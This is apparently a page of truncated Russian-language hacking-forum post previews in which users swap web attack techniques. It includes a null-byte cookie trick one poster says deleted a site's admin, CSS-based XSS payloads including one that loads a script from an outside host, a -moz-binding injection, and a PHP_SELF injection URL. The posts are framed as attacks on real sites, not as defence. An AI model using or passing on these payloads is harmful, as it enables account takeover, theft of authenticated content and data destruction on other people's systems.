Separate names with a comma.
А один раз, на одном ресурсе, мне удалось тереть пользователей, подставив в id куков в конец id - %00, нечто: id=1%00 тёр админа из бд. Однако...
Это я знаю.. Но почему тогда не работает: strpos("try " . urldecode("%00") . " to", "to"); будет true, хотя по идее должно быть false?
Не подскажете, как использовать? В принципе, слышал и про баг в Фаире и слышал про обрубление строк в языках программирования такими...
В ИЕ, чтобы иннерить нужно присутствия каких-нибудь символов между тегами в которые вставляем..
astrologer Блин, респект. Получается. Проблема была в том, что страница, которую хотел получить, назодилось в поддомене.. из поддомена...
Да, HTML-контент, к котором могут содержаться важные данные, предоставляемые авторизованным, к примеру, пользователям. Попробовал и получилось?...
Конкретная семантика. Универсального скрипта не существует.
А я и не говорил, что нельзя подключать скрипты с других сайтов. Я говорил, что AJAX и хирургический доступ к фреймам в таком скрипте, который...
Я понимаю.... если защита от загрузок с другого сайта из другого. Но если сам JS-скрипт находит... *на этом моменте я понял почему запрещено*...
У меня такая ситуация. На странице сайта подключается сторонний JS-скрипт (с другого сайта). При этом неполучается получить контент при помощи...
Подключил... Через биндинг.. CSS: -moz-binding: url("http://localhost/xml.xml#xss"); XML: <?xml version="1.0"?> <bindings...
Быть точнее. style="background: url(javascript: document.createElement('script').src='http://www.mysite.ru/myscript.js');" Это идеально для IE,...
Евгений Минаев Посмотрел этот XML, не, это жесткий метод.. сложно свободно писать Js.. Я хочю через аттрибут в стайле выполнить XSS подключающий...
Хай. По сабжу не подскажите? В IE: style="background: url(javascript:alert());", а в Мозилле, слышал про -mozilla-opacity, или как-то так.....
PHP_SELF уязвимость. http://target.com/kill.php/'">?123=123 будет в обработчике "/kill.php/'">" ;)
